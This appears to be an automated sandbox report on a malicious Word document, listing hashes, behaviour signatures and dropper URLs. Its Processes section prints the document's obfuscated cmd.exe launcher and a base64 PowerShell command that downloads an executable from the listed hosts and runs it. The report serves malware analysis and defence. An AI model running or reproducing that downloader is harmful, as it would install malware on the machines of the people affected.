Analysis
-
max time kernel
111s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
29-04-2024 13:58
General
-
Target
07d3be8c4df887e034194eb0b16c963e_JaffaCakes118.doc
-
Size
90KB
-
MD5
07d3be8c4df887e034194eb0b16c963e
-
SHA1
73aabccc3811c97c64505a3ad45377e0e8a99965
-
SHA256
aa9766333f3c909aef146b12b0b2302f9c898ef949f4e731cb21eb236d6a3793
-
SHA512
009fb5fb473679f7f486e7dd65b6a4b717f3166d2979fe74b469a9e41b9415c605fb93addc4ddcc95ea3d8ed33fa386ad00b8746bb5e291fc8e77cc3450c2d14
-
SSDEEP
1536:tptJlmrJpmxlRw99NBf+aHE+y134L/Ojsn/orH/Dz:zte2dw99fzy1IL/csQrH/
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://lunamarialovelife.com/BGbuRaCy
exe.dropper
http://scotthagar.com/wQf4xNY
exe.dropper
http://vjencanjazagreb.hr/GsRrp
exe.dropper
http://challengerballtournament.com/tZH0dI
exe.dropper
http://xn--12cbq4codld5bxbqy5hych1ap4b0a4mugg.tk/jEKcM
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07d3be8c4df887e034194eb0b16c963e_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /v^:^ ^ ^ /r " s^E^t ^ ^ ^5^t^2=^=^AA^IAAC^AgA^A^IA^ACA^gA^A^IA^ACA^g^A^AIAACA^g^AA^I^AAC^Ag^AA^IA^AC^A^9BQfAs^H^A^oB^w^Y^AQ^H^A^h^B^w^Y^A^0H^A^7Awa^A^E^GAlBgcA^I^GA^7^A^Q^bAc^FAVBAJ^AACA^t^BQ^ZA^QH^AJBQ^LAUG^ArB^w^bAYH^AuBQ^S^As^DApA^Q^b^Ac^FAVB^AJAAC^AsAgWAs^EAW^B^A^J^AgCAl^B^A^b^A^k^GA^GB^A^Z^A^EGAvB^A^bA^4G^A3B^w^bA^Q^E^AuA^QW^Ag^GA^h^B^A^J^A^s^HA^5^B^gcAQHA^7^B^QK^AY^HAk^B^gSA^QC^Ag^Agb^AkG^A^g^A^g^WA^sEA^W^B^AJ^AgC^AoB^w^YA^E^G^Al^B^gc^A^8GAm^B^wO^AcCAl^B^AeAU^GAuA^wJA^sCAM^B^QaA^8^EA^k^A^wKAcCAcB^wJAsC^Aj^B^Qa^A^w^G^A^iBQ^d^A^AH^A6A^gdA4GAlBA^JA0^D^AtBwVAU^F^A^kAwO^AcC^A^5A^QNAIDAn^A^AIA0^D^AgA^AT^A^k^GA^PBA^J^A^sDA^pAwJ^A^AE^AnA^A^K^AQHA^p^BAb^AAHA^T^BgLAcC^AN^B^w^Y^A^s^EAFBga^A8CAr^BAd^A^4CAn^B^wZA^UHAt^BANA^EGAwA^g^Y^A^QDA^wBQYAED^A^oBwYA^kHAo^B^QN^A^k^H^Ax^B^gY^AgHA^i^B^QN^AQG^AsB^A^ZA^8GA^jB^AN^A^E^H^A^iB^wYAIDA^x^AQLA0CA^u^B^Ae^A8C^AvAg^OA^AHA^0^BAd^A^gG^A^AB^QSA^Q^GA^wAA^S^A^oFA0B^wL^A^0^G^Av^Bw^YA4CA0Bg^b^AU^G^A^t^B^QYA^4^GAy^B^Qd^A^8^G^A0BAb^Aw^GA^hB^gYAIH^A^l^Bw^ZA^4GA^lB^AbAwGA^hB^A^a^AM^GAvAwLA^oDA^w^BA^dA^Q^HAoBAQ^A^AH^Ay^B^gUAM^HAH^Bw^L^AI^H^A^o^BgL^AI^GA^l^B^gc^AcG^A^h^B^g^e^A^E^GA^q^Bgb^A^E^G^A^j^B^gbAUG^AqB^gd^A^8C^AvAgO^A^A^HA0^BAdAgGAAB^Q^W^A4^EA^4B^AN^A^YG^AR^B^wdA^8C^A^tBwb^A^MGA^u^AgcA^EGAnB^QYA^g^GA^0^B^AdA8G^AjBwcA^8CAv^A^gO^AA^H^A^0^BA^d^A^g^GA^AB^QeAM^E^A^hB^gUA^U^H^A^iB^wR^AI^EAv^A^Q^bA^8^GAj^Bg^L^A^U^G^Am^BQaAw^G^A^lB^gd^A^8GAsBQ^YA^kG^Ay^BQYA0^GAhBgbAUHA^s^B^wL^A8C^A6^A^Ac^A^Q^HA0^B^Aa^AcCA^9^Ag^dAQG^A^K^BA^J^A^sDA0B^gbAUG^A^p^B^AbA^M^EAi^BQ^Z^AcF^A^uAAdAUGAO^B^AIA^Q^H^AjBQZ^A^o^G^Ai^B^wb^A^0CA^3^BQZA^4^GA9^A^Q^WAgG^Ah^BA^J ^e-^ ^l^le^h^sr^ew^op& ^F^or /^l %^7 iN ( ^ 10^73 -^1^ ^ 0) ^do ^s^et ^iR=!^iR!!^5^t^2:~ %^7, 1!&&^I^f %^7 ^e^Q^u ^0 C^a^l^L %^iR:^*^iR^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABhAGgAWQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABKAGQAdgA9ACcAaAB0AHQAcAA6AC8ALwBsAHUAbgBhAG0AYQByAGkAYQBsAG8AdgBlAGwAaQBmAGUALgBjAG8AbQAvAEIARwBiAHUAUgBhAEMAeQBAAGgAdAB0AHAAOgAvAC8AcwBjAG8AdAB0AGgAYQBnAGEAcgAuAGMAbwBtAC8AdwBRAGYANAB4AE4AWQBAAGgAdAB0AHAAOgAvAC8AdgBqAGUAbgBjAGEAbgBqAGEAegBhAGcAcgBlAGIALgBoAHIALwBHAHMAUgByAHAAQABoAHQAdABwADoALwAvAGMAaABhAGwAbABlAG4AZwBlAHIAYgBhAGwAbAB0AG8AdQByAG4AYQBtAGUAbgB0AC4AYwBvAG0ALwB0AFoASAAwAGQASQBAAGgAdAB0AHAAOgAvAC8AeABuAC0ALQAxADIAYwBiAHEANABjAG8AZABsAGQANQBiAHgAYgBxAHkANQBoAHkAYwBoADEAYQBwADQAYgAwAGEANABtAHUAZwBnAC4AdABrAC8AagBFAEsAYwBNACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABPAGkATAAgAD0AIAAnADIANQA5ACcAOwAkAFUAVwBtAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAE8AaQBMACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABWAEsAWgAgAGkAbgAgACQASgBkAHYAKQB7AHQAcgB5AHsAJABhAGgAWQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABWAEsAWgAsACAAJABVAFcAbQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABVAFcAbQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
15.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
15.8MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
15.8MB
-
Filesize
15.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
15.8MB
-
Filesize
64KB
-
Filesize
64KB